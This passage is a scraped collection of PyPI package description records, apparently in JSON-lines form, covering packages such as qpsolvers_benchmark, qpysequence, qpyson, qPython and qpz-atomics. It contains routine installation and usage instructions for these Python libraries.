Adding this feature is agood way to start contributingto the benchmark.Check out theissue trackerfor ongoing works and future improvements.InstallationYou can install the benchmark and its dependencies in an isolated environment usingconda:conda env create -f environment.yamlconda activate qpsolvers_benchmarkAlternatively, you can install the benchmark on your system usingpip:pip install qpsolvers_benchmarkBy default, the benchmark will run all supported solvers it finds.Running the benchmarkOnce the benchmark is installed, you will be able to run theqpsolvers_benchmarkcommand. Provide it with the script corresponding to thetest setyou want to run, followed by a benchmark command such as \"run\". For instance, let's run the \"dense\" subset of the Maros-Meszaros test set:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py runYou can also run a specific solver, problem or set of solver settings:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py run --solver proxqp --settings defaultCheck outqpsolvers_benchmark --helpfor a list of available commands and arguments.PlotsThe command line ships aplotcommand to compare solver performances over a test set for a specific metric. For instance, run:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py plot runtime high_accuracyTo generate the following plot:ContributingContributions to improving this benchmark are welcome. You can for instance propose new problems, or share the runtimes you obtain on your machine. Check out thecontribution guidelinesfor details.CitationTo cite this benchmark in your scientific works, follow theCite this repositorybutton on GitHub (top-right of therepository page).See alsoReferencesHow not to lie with statistics: the correct way to summarize benchmark results: why geometric means should always be used to summarize normalized results.Optimality conditions and numerical tolerances in QP solvers: note written while figuring out thehigh_accuracysettings of this benchmark.Other benchmarksBenchmarks for optimization softwareby Hans Mittelmann, which includes reports on the Maros-Meszaros test set.jrl-qp/benchmarks: benchmark of QP solvers available in C++.osqp_benchmark: benchmark examples for the OSQP solver.proxqp_benchmark: benchmark examples for the ProxQP solver."} +{"package": "qpsphere", "pacakge-description": "qpsphereis a Python3 library for analyzing spherical objects in\nquantitative phase imaging.DocumentationThe documentation, including the reference and examples, is available atqpsphere.readthedocs.io.Installationpip install qpsphereTestingpip install -e .\npip install pytest\npytest testsReleases to PyPIThe wheel distribution of qpsphere includes binaries of the BHFIELD program\nand are thus platform-specific. When creating the wheels, theplat-namecommand line argument must be set.# on Windows\npython setup.py sdist bdist_wheel --plat-name win_amd64\n# on Linux\npython setup.py sdist bdist_wheel --plat-name manylinux1_x86_64"} +{"package": "qpt-generator", "pacakge-description": "qpt_generatorAn implementation of Question Paper Template Generation Algorithm written in C++ to provide high performance. It uses Cython internally to create python package.IntroductionGeneration of question papers through a question bank is an important activity in learning management systems and educational institutions. 
The quality of question paper is based on various design constraints such as whether a question paper assesses different problem solving skills as per Bloom's taxonomy, whether it covers all units from the syllabus of a course and whether it covers various difficulty levels.I have implemented algorithm written by Vaibhav M. Kale and Arvind W. Kiwelekar for question paper template generation in C++ to provide fast performance. Implementation is extensible in terms of constriant it support to create question paper template.The qpt_generator package was motivated by the needs of my academic projectQuestion Paper Generator.InstallationYou can install qpt_generator using easy_install with following command:pip install qpt-generatororeasy_install qpt-generatorUsageAfter installing module, you can import it using following command:fromqpt_generatorimportQPTGeneratorYou have to provide two inputs to the constructor of QPTGenerator:A dictionary of constraints and lists of distribution of markEx: if you want to generate paper with 4 constraint:Unit-wise distribution of marksDifficulty level-wise distribution of marksCognitive level-wise distribution of marksQuestion-wise distribution of marksA list of question no. associated with list of question-wise mark distributions. Repitition of same question no. indicates subquestions of that question.Output will be generated when you call generate method of the QPTGenerator class. Here, output is a dictionary of list of the alloted unit, cognitive level, difficulty and mark by question no.fromqpt_generatorimportQPTGeneratormark_distributions={\"question\":[5,5,10,4,6,5,5],\"unit\":[8,8,8,5,11],\"difficulty\":[13,15,12],\"cognitive\":[12,18,10],}question_no=[1,1,2,3,3,4,4]qpt=QPTGenerator(mark_distributions,question_no)output=qpt.generate()# output = {'cognitive': [2, 3, 2, 3, 3, 1, 3, 1, 1, 2],# 'difficulty': [3, 1, 2, 2, 1, 3, 3, 1, 2, 3],# 'question': [5, 5, 8, 2, 2, 1, 1, 6, 5, 5],# 'question_no': [1, 1, 2, 2, 3, 3, 3, 3, 4, 4],# 'unit': [4, 5, 1, 3, 2, 2, 3, 5, 2, 3]}To satisfy all given constraints:\nquestion 1 should have 2 subquestions:first question should have cognitive_level = 2, difficulty = 3, unit no.= 4 and mark = 5second question should have cognitive_level = 3, difficulty = 1, unit no.= 5 and mark = 5You can randomly select this kind of questions from your question bank database if it exists.ReferencesAn Algorithm for Question Paper Template\nGeneration in Question Paper Generation System"} +{"package": "qpth", "pacakge-description": "No description available on PyPI."} +{"package": "qpu", "pacakge-description": "QPU (Quantum Processing Unit)A library for quantum processing units (IBM, D-Wave) containing common operations.NoteThis project has been set up using PyScaffold 3.1. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qpubsub", "pacakge-description": "library.qpubsubpubsub layer for NLP servicesUsagesConfigsYou need to configure these in your service:{\"PROJECT_ID\":\"...\",\"SUBSCRIPTION_NAME\":\"...\",\"TOPIC_NAME\":\"...\",\"MAX_MESSAGES\":...}Where:PROJECT_ID: qordoba project id e.g. qordoba-develSUBSCRIPTION_NAME: a subscription to pull the messages from e.g. dev4.segment-delegator.gender-tone-pubsub.allLangTOPIC_NAME: where to publish the result messages e.g. dev4.segment-delegator.gender-tone-pubsub-latch.allLangMAX_MESSAGES: The maximum number of messages in the subscriber queue e.g. 
100Use PubSub onlyAdd this to the serviceapplication.pyps_connection=QPubSub(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection.connect()Use PubSub with RESTAdd this to the serviceapplication.pyrest_connection=QRest(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection=QPubSub(analyzer,white_lister=whitelister,category=category,verbose=VERBOSE,debug=DEBUG,ignore_html=IGNORE_HTML,sentence_token_limit=SENTENCE_TOKEN_LIMIT,ignore_inside_quotes=False)ps_connection.connect_with_rest(rest_connection)Service docker changes to compilegoogle-cloud-pubsubadd the following lines beforepip install -r requirements.txtcommandapkupdate&&\\apkadd--virtualbuild-dependencieslinux-headersbuild-basegcc&&\\add the following lines afterpip install -r requirements.txtcommandapkdelbuild-dependencies&&\\rm-rf/var/cache/apk/*&&\\LicenseThis software is not licensed. If you do not work at Qordoba, you are not legally allowed to use it. Also, it's just helper functions that really won't help you. If something in it does look interesting, and you would like access, open an issue.TODOreduce compile timeadd testshandle errors, e.g. publish it to an error topic or return empty issues to the same topic."} +{"package": "qpvdi", "pacakge-description": "python-dependency-injectionStep to publish open sourceInstall and run buildpython -m buildInstall Twinepip install twineUpload sourcetwine upload dist/*Usage:pip install qpvdi"} +{"package": "qpvdi-quangpv.uit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qpy", "pacakge-description": "Qpy provides a convenient mechanism for generating safely-quoted xml from python code. It does this\nby implementing a quote-no-more string data type and a slightly modified python compiler."} +{"package": "qpydoc", "pacakge-description": "qpydocQuarto-based Python API Documentation ToolDocumenation:https://joelkim.github.io/qpydoc/"} +{"package": "qPyProfiler", "pacakge-description": "qPyProfiler is a GUI (Graphical User Interface) to the Python profiler. It\nallow user to profile python application and browse profiling result in a\nconvenient way. This projet starts on june 2007. I started this project\nbecause I do not found any free software that do that for python profiling."} +{"package": "qpyr", "pacakge-description": "QPYR - QR Code Generation in PythonPython package designed for creating QR codes with support for all QR code versions from 1 to 40. Designed for developers looking for a simple way to integrate QR code generation into their Python applications \ud83d\ude80\ud83d\ude80\ud83d\ude80.Basic usageTo use the package, import and call themainfunction as follows:# Save qrcode as imageimportqpyrqpyr.main(\"google.com\",filepath=\"qr1.png\")# Show qrcode as imageimportqpyrqpyr.main(\"google.com\",show_image=True)ContributingContributions are warmly welcomed! 
Whether you're tackling a bug, adding a new feature, or improving documentation, your input is invaluable in making this library better."} {"package": "qpysequence", "pacakge-description": "QPySequence. Introduction: QPySequence, which stands for Qblox Python Sequence, is a Python library developed by Qilimanjaro to create the sequence.json file that is uploaded to a Qblox sequencer.\nThe sequence that is uploaded to the Qblox instruments is a dictionary of four components: Waveforms: dictionary containing an explicit array representation of the pulses to be played, each identified with an index and a name. Acquisitions: dictionary containing different specifications for the acquisition of data, mainly the number of bins, each identified with an index and a name. Weights: dictionary containing lists of time-dependent acquisition weights, each associated with an index and a name. Program: description of the sequence in the Q1ASM language, represented as plain text. In the program all waveforms, acquisitions and weights are referenced by their indices. In the Qblox docs there are several examples on how to write a Q1ASM program to perform a certain experiment, as well as the necessary waveforms, acquisitions and weights to complete the sequence. This task is usually done by manually writing the waveforms and weights dictionaries with an inline numpy array-generating function; the acquisitions are also specified manually, and finally a Q1ASM program is written as a formatted Python string, with some variables inside for certain parameters. This procedure is feasible for small examples and certain simple experiments. However, when integrating this into a larger codebase, for example inside a general quantum control library with a complex class structure, holding many instrument drivers and being developed by several collaborators, the maintenance, quality, readability and debugging of the code can become a cumbersome task. While certain parts of this procedure could be modularized with some helper functions, the string nature of the Q1ASM program, together with the remaining parts of the sequence it is connected to only indirectly via integers (the indices) that have to be handled separately, still leaves a lot of room for improvement through a higher abstraction layer that would handle the creation of the sequence in an easier and more robust manner. QPySequence is a library that handles all the components of a sequence as Python objects, from the sequence itself down to each instruction of the program, including new abstractions such as blocks and loops to structure the program in a clearer and more readable way. Structure: The main classes of QPySequence imitate the structure of the sequence.json itself: Waveforms, Acquisitions, Weights and Program, as well as the class Sequence which contains them.\nThe Program class is the most complex of the main four, with several internal classes used to structure all the instructions it holds (instances of classes which inherit from the abstract Instruction class). In contrast, the other three main classes (Acquisitions, Weights and Waveforms) share a very similar structure, since their structure is that of their dictionary counterpart in sequence.json, with the addition of methods that facilitate their construction.\nAll the classes that are not internal have an implementation of the repr() method, which gives the equivalent string representation of that object that will actually be sent to the sequencer. 
In this way, when aSequenceobject is completed with all of its components and itsrepr()method is called, it calls therepr()method of its elements, which gets recursively repeated until until reaching the lower layers, obtaining finally the complete string representation of thesequence.jsonfile that can be directly uploaded to a Qblox sequencer.\nTherepr()method can be called on any component of QPySequence, which allow to only generate the string representation of a single component, as theProgramfor example, if desired.ExampleThis simple example illustrates how to create a sequence for an averaged readoutimportqpysequenceasqpsimportnumpyasnp# Experiment parametersreadout_duration=1000play_acq_delay=120averaging_repetitions=1024# Create waveformswaveforms=qps.waveforms.Waveforms()readout_pulse=np.array([1.0+0.0jfor_inrange(readout_duration)],dtype=np.complex128)ro_index_i,ro_index_q=waveforms.add_pair_from_complex(readout_pulse)# Create acquisitionsacquisitions=qps.acquisitions.Acquisitions()acq_index=acquisitions.add(\"averaged\")# Create an empty weights objectweights={}# Create the programprogram=qps.program.Program()main_loop=qps.program.Loop(\"main\",averaging_repetitions)play=qps.program.instructions.Play(ro_index_i,ro_index_q,play_acq_delay)acquire=qps.program.instructions.Acquire(acq_index,bin_index=0,wait_time=readout_duration)main_loop.append_components([play,acquire])program.append_block(main_loop)# Create the sequence with all the componentssequence=qps.Sequence(program,waveforms,acquisitions,weights)# The sequence can now be converted to a json string and uploaded to a qblox sequencersequence_json=repr(sequence)Development setupIf you want to participate in the project, set up first your local environment, set up the git hooks and install the library.Read thedevelopmentdocumentation."} +{"package": "qpyson", "pacakge-description": "qpyson: Thin Commandline Tool to Explore, Transform, and Munge JSON using PythonThe JSON querying tool,jq, is a\nreally powerful tool. 
However, it\u2019s sometimes a bit involved and has a\nlearning curve that requires digging into thejq\nmanualand familiarizing\nyourself with a custom language.qpysonis a thin commandline tool to explore, transform, or munge JSON\nusing Python as the processing language.GoalsProcess (filter, map, general munging) of JSON files using PythonThin layer to process or apply transforms written in PythonProvide Python function as a string to the commandline or define\nPython functions in an external fileCustom functions can be parameterized and configured from the\ncommandlineOutput results are emitted as JSON or in tabular form (usingtabulatefor quick viewing\nfrom the commandlineNon-GoalsA replacement forjqNo custom DSL for filtering or querying (use Python directly)Does not support streaming (JSON files are loaded into memory)InstallationRecommended to install using avirtualenvorcondaenv to install.pip install qpysonQuick TourExample data from the Iris dataset.head examples/iris.json\n\n[\n {\"sepalLength\": 5.1, \"sepalWidth\": 3.5, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.9, \"sepalWidth\": 3.0, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.7, \"sepalWidth\": 3.2, \"petalLength\": 1.3, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.6, \"sepalWidth\": 3.1, \"petalLength\": 1.5, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 5.0, \"sepalWidth\": 3.6, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 5.4, \"sepalWidth\": 3.9, \"petalLength\": 1.7, \"petalWidth\": 0.4, \"species\": \"setosa\"},\n {\"sepalLength\": 4.6, \"sepalWidth\": 3.4, \"petalLength\": 1.4, \"petalWidth\": 0.3, \"species\": \"setosa\"},\n {\"sepalLength\": 5.0, \"sepalWidth\": 3.4, \"petalLength\": 1.5, \"petalWidth\": 0.2, \"species\": \"setosa\"},\n {\"sepalLength\": 4.4, \"sepalWidth\": 2.9, \"petalLength\": 1.4, \"petalWidth\": 0.2, \"species\": \"setosa\"},The commandline tool takes a function written as commandline string or\nreferenced in an external file as well as the JSON file to be processed.qpyson --help\n\nqpyson: error: the following arguments are required: path_or_cmd, json_file\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)We can define a custom function to process the JSON dataset. 
By default\nthe function is namedfand can be customized by-for--function-namecommandline argument.qpyson \"def f(d): return d[0]\" examples/iris.json\n\n{\n \"sepalLength\": 5.1,\n \"sepalWidth\": 3.5,\n \"petalLength\": 1.4,\n \"petalWidth\": 0.2,\n \"species\": \"setosa\"\n}We can also write custom functions in a Python file.cat examples/iris_explore.py\n\ndef f(d):\n return d[0]\n\n\ndef f2(d, max_items: int = 10):\n return d[:max_items]\n\n\ndef f3(d, max_items: int = 5):\n return [x for x in d if x[\"species\"] == \"setosa\"][:max_items]\n\n\ndef f4(d, sort_field: str, sort_direction: str = \"asc\", max_items: int = 5):\n reverse = not (sort_direction == \"asc\")\n d.sort(key=lambda x: x[sort_field], reverse=reverse)\n return d[:max_items]\n\n\ndef f0(d):\n # Identity operator\n return d\n\n\ndef first(d):\n return d[0]\n\n\ndef p(d, field: str = \"sepalLength\"):\n import pandas as pd\n\n df = pd.DataFrame.from_dict(d)\n sdf = df.describe()\n return sdf.to_dict()[field]Executing--helpwill show the output options.qpyson examples/iris_explore.py examples/iris.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. 
See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)Executing functionf, yields:qpyson examples/iris_explore.py examples/iris.json \n\n{\n \"sepalLength\": 5.1,\n \"sepalWidth\": 3.5,\n \"petalLength\": 1.4,\n \"petalWidth\": 0.2,\n \"species\": \"setosa\"\n}The output view can be changed to a table view using--print-tableor-t.qpyson examples/iris_explore.py examples/iris.json --print-table --table-style github\n\n| sepalLength | sepalWidth | petalLength | petalWidth | species |\n|---------------|--------------|---------------|--------------|-----------|\n| 5.1 | 3.5 | 1.4 | 0.2 | setosa |A better example using functionf2defined iniris_explore.pyqpyson examples/iris_explore.py examples/iris.json --function-name f2 --print-table\n\n sepalLength sepalWidth petalLength petalWidth species\n------------- ------------ ------------- ------------ ---------\n 5.1 3.5 1.4 0.2 setosa\n 4.9 3 1.4 0.2 setosa\n 4.7 3.2 1.3 0.2 setosa\n 4.6 3.1 1.5 0.2 setosa\n 5 3.6 1.4 0.2 setosa\n 5.4 3.9 1.7 0.4 setosa\n 4.6 3.4 1.4 0.3 setosa\n 5 3.4 1.5 0.2 setosa\n 4.4 2.9 1.4 0.2 setosa\n 4.9 3.1 1.5 0.1 setosaCustom functions can be defined with required or optional values (with\ndefaults) combined with Python 3 type annotations to generatecat examples/iris.py\n\n# More examples that demonstrate generating commandline arguments\n\n\ndef f(d, sort_field: str, sort_direction: str = \"asc\", max_items: int = 5):\n reverse = not (sort_direction == \"asc\")\n d.sort(key=lambda x: x[sort_field], reverse=reverse)\n return d[:max_items]\n\n\ndef g(d, field: str = \"sepalLength\"):\n import pandas as pd\n\n df = pd.DataFrame.from_dict(d)\n sdf = df.describe()\n return sdf.to_dict()[field]And calling--helpwill show the custom function specific arguments\n(e.g.,--max_itemsand--sort_direction)qpyson examples/iris.py examples/iris.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help] [--sort_field SORT_FIELD]\n [--sort_direction SORT_DIRECTION] [--max_items MAX_ITEMS]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. 
See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)\n --sort_field SORT_FIELD\n sort_field type: from custom func `f`\n (default: _empty)\n --sort_direction SORT_DIRECTION\n sort_direction type: from custom func `f`\n (default: asc)\n --max_items MAX_ITEMS\n max_items type: from custom func `f`\n (default: 5)And calling with custom options yields:qpyson examples/iris.py examples/iris.json -t --max_items=3 --sort_direction=desc --sort_field sepalLength\n\n sepalLength sepalWidth petalLength petalWidth species\n------------- ------------ ------------- ------------ ---------\n 7.9 3.8 6.4 2 virginica\n 7.7 3.8 6.7 2.2 virginica\n 7.7 2.6 6.9 2.3 virginicaAnother Example calling pandas underneath the hood to get a quick\nsummary of the data.qpyson examples/iris.py examples/iris.json -t -f g --field=sepalLength\n\n count mean std min 25% 50% 75% max\n------- ------- -------- ----- ----- ----- ----- -----\n 150 5.84333 0.828066 4.3 5.1 5.8 6.4 7.9It\u2019s also possible to create thin JSON munging tools for configuration\nof systems or tools that take JSON as input.For example a JSON configuration template with defaults.cat examples/config_template.json\n\n{\n \"alpha\": 1234,\n \"beta\": null,\n \"gamma\": 90.1234\n}And a processing function,f.cat examples/config_processor.py\n\ndef f(dx, alpha: float, beta: float, gamma: float):\n \"\"\"Simple example of config munging\"\"\"\n\n def _set(k, v):\n if v:\n dx[k] = v\n\n items = [(\"alpha\", alpha), (\"beta\", beta), (\"gamma\", gamma)]\n\n for name, value in items:\n _set(name, value)\n\n dx[\"_comment\"] = \"Configured with qpyson\"\n return dxRunning--helpwill show the supported configuration options.qpyson examples/config_processor.py examples/config_template.json --help\n\nusage: qpyson [-f FUNCTION_NAME] [-n] [--indent INDENT] [-t]\n [--table-style TABLE_STYLE]\n [--log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}]\n [--help] [--alpha ALPHA] [--beta BETA] [--gamma GAMMA]\n path_or_cmd json_file\n\nUtil to use Python to process (e.g., filter, map) JSON files\n\npositional arguments:\n path_or_cmd Path to python file, or python cmd\n json_file Path to JSON file\n\noptional arguments:\n -f FUNCTION_NAME, --function-name FUNCTION_NAME\n Function name (default: f)\n -n, --no-pretty (Non-table) Pretty print the output of dicts and list\n of dicts (default: False)\n --indent INDENT (Non-table) Pretty print indent spacing (default: 2)\n -t, --print-table Pretty print results (default: False)\n --table-style TABLE_STYLE\n Table fmt style using Tabulate. 
See\n https://github.com/astanin/python-tabulate#table-\n format for available options (default: simple)\n --log-level {CRITICAL,ERROR,WARNING,INFO,DEBUG,NOTSET}\n Log level (default: NOTSET)\n --help Show this help message and exit (default: False)\n --alpha ALPHA alpha type: from custom func `f`\n (default: _empty)\n --beta BETA beta type: from custom func `f`\n (default: _empty)\n --gamma GAMMA gamma type: from custom func `f`\n (default: _empty)Now configuringalpha,betaandgamma.qpyson examples/config_processor.py examples/config_template.json --alpha 1.23 --beta 2.34 --gamma 3.45\n\n{\n \"alpha\": 1.23,\n \"beta\": 2.34,\n \"gamma\": 3.45,\n \"_comment\": \"Configured with qpyson\"\n}TestingTesting is currently done using RMarkdown using the make targetdoc.This should probably be ported to non-R based approach. However, this\ncurrent approach does keep the docs (e.g., README.md) up to date.Related JQ-ish toolshttps://github.com/dbohdan/structured-text-tools#json"} +{"package": "qPython", "pacakge-description": ".. ATTENTION::This project is in maintenance mode. We may fix bugs, but no new features will be added in foreseeable future.qPython=======qPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:- Synchronous and asynchronous queries- Convenient asynchronous callbacks mechanism- Support for kdb+ protocol and types: v3.0, v2.6, v<=2.5- Uncompression of the IPC data stream- Internal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)- Supported on Python 2.7/3.4/3.5/3.6 and numpy 1.8+For more details please refer to the `documentation`_.Installation------------To install qPython from PyPI:``$ pip install qpython``**Please do not use old PyPI package name: exxeleron-qpython.**Building package----------------Documentation~~~~~~~~~~~~~qPython documentation is generated with help of `Sphinx`_ document generator.In order to build the documentation, including the API docs, execute:``make html`` from the doc directory.Documentation is built into the: ``doc/build/html/`` directory.Compile Cython extensions~~~~~~~~~~~~~~~~~~~~~~~~~qPython utilizes `Cython`_ to tune performance critical parts of the code.Instructions:- Execute: ``python setup.py build_ext --inplace``Build binary distribution~~~~~~~~~~~~~~~~~~~~~~~~~Instructions:- Execute: ``python setup.py bdist``Testing~~~~~~~qPython uses py.test as a test runner for unit tests.Instructions:- Make sure that top directory is included in the ``PYTHONPATH``- Execute: ``py.test``Requirements~~~~~~~~~~~~qPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:- tune performance of critical parts of the code:- Cython 0.20.1- support serialization/deserialization of ``pandas.Series`` and ``pandas.DataFrame``- pandas 0.14.0- run Twisted sample:- Twisted 13.2.0- build documentation via Sphinx:- Sphinx 1.2.3- mock 1.0.1Required libraries can be installed using `pip`_.To install all the required dependencies, execute:``pip install -r requirements.txt``Minimal set of required dependencies can be installed by executing:``pip install -r requirements-minimal.txt``.. _Cython: http://cython.org/.. _Sphinx: http://sphinx-doc.org/.. _pip: http://pypi.python.org/pypi/pip.. 
_documentation: http://qpython.readthedocs.org/en/latest/"} +{"package": "qPython3", "pacakge-description": "qPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:Synchronous and asynchronous queriesConvenient asynchronous callbacks mechanismSupport for kdb+ protocol and types as of kdb+ v4.0Uncompression of the IPC data streamInternal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)Supported on Python 3.4/3.5/3.6 and numpy 1.8+For more details please refer to thedocumentation.InstallationTo install qPython from PyPI:$ pip install qpython3Please do not use old PyPI package name: qpython or exxeleron-qpython.Building packageDocumentationqPython documentation is generated with help ofSphinxdocument generator.\nIn order to build the documentation, including the API docs, execute:make htmlfrom the doc directory.Documentation is built into the:doc/build/html/directory.Compile Cython extensionsqPython utilizesCythonto tune performance critical parts of the code.Instructions:Execute:python setup.py build_ext--inplaceBuild binary distributionInstructions:Execute:python setup.py bdistTestingqPython uses py.test as a test runner for unit tests.Instructions:Make sure that top directory is included in thePYTHONPATHExecute:py.testRequirementsqPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:tune performance of critical parts of the code:Cython 0.20.1support serialization/deserialization ofpandas.Seriesandpandas.DataFramepandas 0.14.0run Twisted sample:Twisted 13.2.0build documentation via Sphinx:Sphinx 1.2.3mock 1.0.1Required libraries can be installed usingpip.To install all the required dependencies, execute:pip install-rrequirements.txtMinimal set of required dependencies can be installed by executing:pip install-rrequirements-minimal.txt"} +{"package": "qPython-nocython", "pacakge-description": "ATTENTION::This project is in maintenance mode. 
We may fix bugs, but no new features will be added in foreseeable future.qPythonqPython is a Python library providing support for interprocess communication between Python and kdb+ processes, it offers:Synchronous and asynchronous queriesConvenient asynchronous callbacks mechanismSupport for kdb+ protocol and types: v3.0, v2.6, v<=2.5Uncompression of the IPC data streamInternal representation of data via numpy arrays (lists, complex types) and numpy data types (atoms)Supported on Python 2.7/3.4/3.5/3.6 and numpy 1.8+For more details please refer to thedocumentation.InstallationTo install qPython from PyPI:$ pip install qpythonPlease do not use old PyPI package name: exxeleron-qpython.Building packageDocumentationqPython documentation is generated with help ofSphinxdocument generator.\nIn order to build the documentation, including the API docs, execute:make htmlfrom the doc directory.Documentation is built into the:doc/build/html/directory.Compile Cython extensionsqPython utilizesCythonto tune performance critical parts of the code.Instructions:Execute:python setup.py build_ext--inplaceBuild binary distributionInstructions:Execute:python setup.py bdistTestingqPython uses py.test as a test runner for unit tests.Instructions:Make sure that top directory is included in thePYTHONPATHExecute:py.testRequirementsqPython requires numpy 1.8 to run.Optional requirements have to be met to provide additional features:tune performance of critical parts of the code:Cython 0.20.1support serialization/deserialization ofpandas.Seriesandpandas.DataFramepandas 0.14.0run Twisted sample:Twisted 13.2.0build documentation via Sphinx:Sphinx 1.2.3mock 1.0.1Required libraries can be installed usingpip.To install all the required dependencies, execute:pip install-rrequirements.txtMinimal set of required dependencies can be installed by executing:pip install-rrequirements-minimal.txt"} +{"package": "qPyUtils", "pacakge-description": "No description available on PyPI."} +{"package": "qpz-atomics", "pacakge-description": "OverviewThis library provides atomic functions implementations for easing the\ndevelopment of quantum networking protocols. The library provides\nfunctions in a simulation backend agnostic way thanks to a thin wrapping\nof their basic functionalities. The various atomic function\nimplementations are dispatched in several submodules depending on their\nanticipated use. The surrent submodules classification is:mapping(the thing wrapper around a simulation backend)gate(everything that applies a fixed quantum unitary over 1 or 2\nqubits)prep(operations related to prepare given sets of quantum states)meas(operations related to measure quantum subsystems according\nto some fixed POVM)test(operations related to testing that one or several quantum\nsubsystems have a given property)util(useful operations that might not be directly related to a\nspecific quantum operation but which are good to have)tran(transport layer protocols which might not be readily\navailable for all backends or which would need to include more robust\nimplementations)Functionality tests are being developed for the atomic functions relying\non thehypothesispackage. The test tend to follow the cryptographic\napproach of \u201ccorrectness\u201d. 
The \u201csecurity\u201d part is usually not performed\nas this most of the times involves checking indistinguishability of\nprobability distributions\u2026StatusImplemented atomic functions and planningNameImplementationDoc stringTestSubmoduleCommentSending qubit (given by simulation backend)DNEOKNAsimulaqron mappingReceive qubit (given by simulation backend)DNEOKNAsimulaqron mappingLocal Clifford Gates (CNOT, H, Pauli\u2019s)DNEOKNAsimulaqron mappingLocal non-Clifford Gates (T, Tinv)DNEOKNAsimulaqron mappingCZ gateDNEOKTDOgateself inverse, and corresponds to classically controlled Z for comp. basis controlCSWAP gateDNEOKTDOgateCreation Pauli eigenstatesDNEOKDNEprepCreation and broadcast of n-party GHZ stateDNEOKDNEprepSingle qubit equatorial plane preparationDNEOKTDOprepCreation and broadcast of n-party stabilizer statesNXTprepQFactoryLTRprepProjections onto Pauli eigenstatesDNEOKOKmeasSingle qubit equatorial plane measurementTDOmeasMulti qubit POVMLTRmeasQuantum One-Time-Pad encode / decodeDNEOKOKpresBB84 encode / decode is a subset of QOTP encode / decodeNANANANACollective BB84 encodingDNGpresSwap TestDNEOKTDOtestVerification of stabilizer statetestQuantum RNGDNECheckTDOutilInformation reconciliationLTRutilClassical error correctionLTRutilQuantum error correctionLTRutilPrivacy amplificationLTRutilQuantum one-way functionNXTutilWeak string erasureNXTTeleportation sendTDOtranTeleportation receiveTDOtranQuantum authenticated channelLTRSecure classical broadcast channelLTRClassical authenticated channelLTRDesign principlesThere exist many different quantum computing backends. The idea with\nthis library was to abstract them away so that code running written\nusing the library could be run on other backends, provided that the rest\nof the code not composed of functions defined by the library is not\nbackend specific.To do this, we instantiate the library by giving it a mapping and a\nnode. The mapping is the translation of the backend specific way of\ncalling elementary quantum operations, while the node is the actual\nquantum registers that are available to perform the 